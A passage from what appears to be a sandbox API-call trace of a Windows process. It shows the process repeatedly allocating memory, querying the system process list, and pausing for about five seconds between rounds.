ResultLength=0x0) returned 0xc0000004 [0275.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.454] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.462] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.476] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.483] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.491] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.497] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.504] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.511] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.531] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.539] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.545] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.552] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.559] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.573] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.580] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.587] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0275.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0275.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0275.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0275.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0275.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0275.597] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0275.600] NtAllocateVirtualMemory (in: 